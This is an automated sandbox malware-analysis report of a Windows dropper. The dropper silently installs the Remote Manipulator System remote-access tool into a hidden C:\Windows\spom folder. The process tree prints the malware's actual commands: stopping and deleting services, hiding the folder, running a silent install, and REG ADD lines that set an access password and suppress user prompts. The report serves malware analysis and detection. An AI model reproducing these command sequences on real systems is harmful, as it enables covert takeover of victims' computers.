Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-11-2022 19:58
Static task
static1
Behavioral task
behavioral1
Sample
e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
Resource
win7-20220812-en
General
-
Target
e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
-
Size
4.1MB
-
MD5
eae75b37854b85772f17ac14433d1c9c
-
SHA1
548cdfc98868615232033618b6bd926c20e25acd
-
SHA256
e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe
-
SHA512
3b234d252a479940a8f9b2171a59eb90e927db671ffc5bcffec925ec07ca410f050929ebb2c232cda3aca1752542e1d3ca67a70f17c2ee0f0498812c30aae512
-
SSDEEP
98304:VgwRVwrPDPnWKw6ki4JNHrotxdJP2jTqmuX3O2HChZy7hx:VgCIu5cUpoXdJuSmyOXo7b
Malware Config
Signatures
-
Executes dropped EXE 8 IoCs
Processes:
data.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.exepid process 1376 data.exe 3476 rutserv.exe 4404 rutserv.exe 4348 rutserv.exe 3392 rutserv.exe 532 rfusclient.exe 1112 rfusclient.exe 3432 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx behavioral2/memory/532-183-0x0000000000400000-0x0000000000AE6000-memory.dmp upx behavioral2/memory/1112-184-0x0000000000400000-0x0000000000AE6000-memory.dmp upx C:\Windows\spom\rfusclient.exe upx behavioral2/memory/3432-187-0x0000000000400000-0x0000000000AE6000-memory.dmp upx behavioral2/memory/532-188-0x0000000000400000-0x0000000000AE6000-memory.dmp upx behavioral2/memory/1112-189-0x0000000000400000-0x0000000000AE6000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -
Processes:
data.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\hide.exe autoit_exe -
Drops file in Windows directory 64 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Windows\spom\dd_vcredistUI4F1D.txt cmd.exe File created C:\Windows\spom\nouac.cmd cmd.exe File opened for modification C:\Windows\spom\rutserv.exe cmd.exe File opened for modification C:\Windows\spom\StructuredQuery.log cmd.exe File created C:\Windows\spom\wctC61E.tmp cmd.exe File created C:\Windows\spom\AdobeSFX.log cmd.exe File opened for modification C:\Windows\spom\data.exe cmd.exe File created C:\Windows\spom\GBQHURCC-20220812-1921.log cmd.exe File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html cmd.exe File opened for modification C:\Windows\spom\wmsetup.log cmd.exe File created C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI4F1D.txt cmd.exe File created C:\Windows\spom\webmmux.dll cmd.exe File opened for modification C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp cmd.exe File opened for modification C:\Windows\spom\hide.exe cmd.exe File created C:\Windows\spom\wct1510.tmp cmd.exe File opened for modification C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp cmd.exe File opened for modification C:\Windows\spom\chrome_installer.log cmd.exe File opened for modification C:\Windows\spom\nouac.cmd cmd.exe File created C:\Windows\spom\vp8encoder.dll cmd.exe File created C:\Windows\spom\webmvorbisencoder.dll cmd.exe File opened for modification C:\Windows\spom\dd_vcredistMSI4F4B.txt cmd.exe File created C:\Windows\spom\dd_vcredistUI4F4B.txt cmd.exe File opened for modification C:\Windows\spom\dd_vcredistMSI4F1D.txt cmd.exe File opened for modification C:\Windows\spom\rfusclient.exe cmd.exe File opened for modification C:\Windows\spom\webmvorbisdecoder.dll cmd.exe File created C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp cmd.exe File opened for modification C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File opened for modification C:\Windows\spom\GBQHURCC-20220812-1921.log cmd.exe File opened for modification C:\Windows\spom\msedge_installer.log cmd.exe File created C:\Windows\spom\rfusclient.exe cmd.exe File created C:\Windows\spom\StructuredQuery.log cmd.exe File created C:\Windows\spom\uac.cmd cmd.exe File opened for modification C:\Windows\spom\vp8encoder.dll cmd.exe File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI4F4B.txt cmd.exe File opened for modification C:\Windows\spom\wct8E36.tmp cmd.exe File created C:\Windows\spom\dd_vcredistMSI4F1D.txt cmd.exe File created C:\Windows\spom\hide.exe cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File opened for modification C:\Windows\spom\wctC61E.tmp cmd.exe File created C:\Windows\spom\aria-debug-4640.log cmd.exe File created C:\Windows\spom\chrome_installer.log cmd.exe File opened for modification C:\Windows\spom\jawshtml.html cmd.exe File opened for modification C:\Windows\spom\vp8decoder.dll cmd.exe File opened for modification C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp cmd.exe File opened for modification C:\Windows\spom\JavaDeployReg.log cmd.exe File created C:\Windows\spom\JavaDeployReg.log cmd.exe File opened for modification C:\Windows\spom\jusched.log cmd.exe File created C:\Windows\spom\wct4E2A.tmp cmd.exe File opened for modification C:\Windows\spom\webmmux.dll cmd.exe File created C:\Windows\spom\webmvorbisdecoder.dll cmd.exe File created C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp cmd.exe File opened for modification C:\Windows\spom\AdobeSFX.log cmd.exe File opened for modification C:\Windows\spom\BroadcastMsg_1660332030.txt cmd.exe File opened for modification C:\Windows\spom\uac.cmd cmd.exe File created C:\Windows\spom\vp8decoder.dll cmd.exe File opened for modification C:\Windows\spom\wct399A.tmp cmd.exe File opened for modification C:\Windows\spom\wct4E2A.tmp cmd.exe File opened for modification C:\Windows\spom attrib.exe File created C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp cmd.exe File opened for modification C:\Windows\spom\GBQHURCC-20220812-1921a.log cmd.exe File created C:\Windows\spom\jusched.log cmd.exe File created C:\Windows\spom\msedge_installer.log cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 1044 sc.exe 5036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exepid process 3476 rutserv.exe 3476 rutserv.exe 3476 rutserv.exe 3476 rutserv.exe 3476 rutserv.exe 3476 rutserv.exe 4404 rutserv.exe 4404 rutserv.exe 4348 rutserv.exe 4348 rutserv.exe 3392 rutserv.exe 3392 rutserv.exe 3392 rutserv.exe 3392 rutserv.exe 3392 rutserv.exe 3392 rutserv.exe 532 rfusclient.exe 532 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 3432 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rutserv.exerutserv.exerutserv.exedescription pid process Token: SeDebugPrivilege 3476 rutserv.exe Token: SeDebugPrivilege 4348 rutserv.exe Token: SeTakeOwnershipPrivilege 3392 rutserv.exe Token: SeTcbPrivilege 3392 rutserv.exe Token: SeTcbPrivilege 3392 rutserv.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
data.exepid process 1376 data.exe 1376 data.exe 1376 data.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
data.exepid process 1376 data.exe 1376 data.exe 1376 data.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 3476 rutserv.exe 4404 rutserv.exe 4348 rutserv.exe 3392 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exedata.execmd.exenet.exenet.exerutserv.exedescription pid process target process PID 1500 wrote to memory of 1376 1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe data.exe PID 1500 wrote to memory of 1376 1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe data.exe PID 1500 wrote to memory of 1376 1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe data.exe PID 1500 wrote to memory of 2112 1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe cmd.exe PID 1500 wrote to memory of 2112 1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe cmd.exe PID 1500 wrote to memory of 2112 1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe cmd.exe PID 1376 wrote to memory of 4532 1376 data.exe cmd.exe PID 1376 wrote to memory of 4532 1376 data.exe cmd.exe PID 1376 wrote to memory of 4532 1376 data.exe cmd.exe PID 4532 wrote to memory of 308 4532 cmd.exe net.exe PID 4532 wrote to memory of 308 4532 cmd.exe net.exe PID 4532 wrote to memory of 308 4532 cmd.exe net.exe PID 308 wrote to memory of 4040 308 net.exe net1.exe PID 308 wrote to memory of 4040 308 net.exe net1.exe PID 308 wrote to memory of 4040 308 net.exe net1.exe PID 4532 wrote to memory of 1820 4532 cmd.exe net.exe PID 4532 wrote to memory of 1820 4532 cmd.exe net.exe PID 4532 wrote to memory of 1820 4532 cmd.exe net.exe PID 1820 wrote to memory of 2888 1820 net.exe net1.exe PID 1820 wrote to memory of 2888 1820 net.exe net1.exe PID 1820 wrote to memory of 2888 1820 net.exe net1.exe PID 4532 wrote to memory of 1044 4532 cmd.exe sc.exe PID 4532 wrote to memory of 1044 4532 cmd.exe sc.exe PID 4532 wrote to memory of 1044 4532 cmd.exe sc.exe PID 4532 wrote to memory of 5036 4532 cmd.exe sc.exe PID 4532 wrote to memory of 5036 4532 cmd.exe sc.exe PID 4532 wrote to memory of 5036 4532 cmd.exe sc.exe PID 4532 wrote to memory of 1420 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1420 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1420 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4612 4532 cmd.exe attrib.exe PID 4532 wrote to memory of 4612 4532 cmd.exe attrib.exe PID 4532 wrote to memory of 4612 4532 cmd.exe attrib.exe PID 4532 wrote to memory of 3476 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 3476 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 3476 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 4404 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 4404 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 4404 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 3196 4532 cmd.exe reg.exe PID 4532 wrote to memory of 3196 4532 cmd.exe reg.exe PID 4532 wrote to memory of 3196 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4208 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4208 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4208 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2248 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2248 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2248 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4244 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4244 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4244 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1748 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1748 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1748 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2656 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2656 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2656 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2292 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2292 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2292 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4348 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 4348 4532 cmd.exe rutserv.exe PID 4532 wrote to memory of 4348 4532 cmd.exe rutserv.exe PID 3392 wrote to memory of 532 3392 rutserv.exe rfusclient.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe"C:\Users\Admin\AppData\Local\Temp\e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\data.exe"C:\Users\Admin\AppData\Local\Temp\data.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nouac.cmd3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop netaservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice5⤵
-
C:\Windows\SysWOW64\net.exenet stop rmanservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice5⤵
-
C:\Windows\SysWOW64\sc.exesc delete netaservice4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"4⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /silentinstall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /firewall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0065006600770066006500660073006500660040006d00610069006c002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00440045003600300041003100380035002d0046003800310043002d0034004400310039002d0042003000440036002d003500350033003300320037003300390046004400320044007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a004⤵
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /start4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
-
C:\Windows\spom\rutserv.exeC:\Windows\spom\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmdFilesize
300B
MD5ad4e1f735a6dc6186785994664e4a6ca
SHA1abb665a10047585838e600ed4d2e3fb23314698c
SHA2560e6f1b05360848a0cea7dcc9a8bdf33d678ba69ad0ab646fbfbc265263eca662
SHA512ae0e9ebde76b56c6d1fe5f92996b723a7a9fbf4b134a430fb315c6fe057b0075cc63c39fc589d1b051223dbe03bb27791bb9353d92ef2bf95b580eded037365d
-
C:\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\hide.exeFilesize
819KB
MD572cc4ab6ee23c79bbeed4c4d7b31f741
SHA1a5598acb794ebbbad6c0819c20f6f7ed99541e89
SHA2565be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73
SHA5124840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5
-
C:\Users\Admin\AppData\Local\Temp\nouac.cmdFilesize
10KB
MD57050a3b6745999edb2eeeacfc2a580ba
SHA1f452f8e96bf51887910416452ae0f8c7b5d39a00
SHA256abc449be609cbc0ae99649f4c4eb06380aa9467dc243346b3fa17e61104eec94
SHA5128c888de3a77ecde92a172c4314d91cfb9cefd215397bdded3e448190f5c1de9d7e38a94e581c8e5c0527516a2fc0697e78828773d3ef834bfde41085745d24d7
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Users\Admin\AppData\Local\Temp\uac.cmdFilesize
10KB
MD5c4c7b84f53ad6a9801818d1dfe71dce8
SHA182de045aacf84825cd301be26a941c2fb2eea36b
SHA256fc612fa3869d2c4ab22a1bb500e405c4318ee4fed16e2da28974f3aa97bab844
SHA5121fef234ae4e5255d93670cf5794c7e032d623f101699dcffa4bd26b9e7411679d544afec8f05762a5e96134a10efe9ff41e75edab9607ed5288851332ce37e97
-
C:\Users\Admin\AppData\Local\Temp\vp8decoder.dllFilesize
127KB
MD5bda3c03c3e5d65922a311009e0ae8cd6
SHA137093c457ac5f01649b4d23a3d075a531af08baa
SHA25630dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
